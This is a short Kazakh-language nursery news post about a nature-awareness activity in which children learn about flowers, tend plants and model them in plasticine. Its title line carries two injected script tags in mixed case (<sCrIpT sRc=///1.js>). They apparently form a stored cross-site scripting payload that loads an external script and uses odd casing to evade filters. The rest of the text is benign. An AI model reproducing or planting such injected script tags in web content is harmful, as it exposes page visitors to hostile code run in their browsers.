"Балбөбек" санаторлық тобында "Қоршаған ортамен танысу" ұйымдастырылған іс-әрекеті<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.10.2022

Уәлиханов көшесіндегі " Ақбота" бөбекжайындағы "Балбөбек" санаторлық тобында "Қоршаған ортамен танысу" ұйымдастырылған іс-әрекеті өткізілді. Балалар   гүлдердің  атауларымен, сырт келбетімен, жеке бөлшек  атауларымен танысты. Топ гүлдерінің шаңын сүртіп, қопсытып, су құйды. Содан соң, дәстүрлі емес әдіс-тәсілдер арқылы  саусақтың ұшымен, ермексазды созу арқылы гүлдер жасады. Бұл әрекет бүлдіршіндерге  саусақ моторикасын дамытуға пайдасын тигізді, әрі  балаларға ұнады, қызығушылықпен  орындай бастады. Ұйымдастырылған іс-әрекеттің мақсаты: әдемілікті сезіне білуге, табиғатты, гүлдерді  қорғауға, адамгершілікке, еңбекқорлыққа, ұқыптылыққа тәрбиелеу болып табылды.

Просмотров: 360


Пікір қосу



Деректерді қолтаңбаға қосу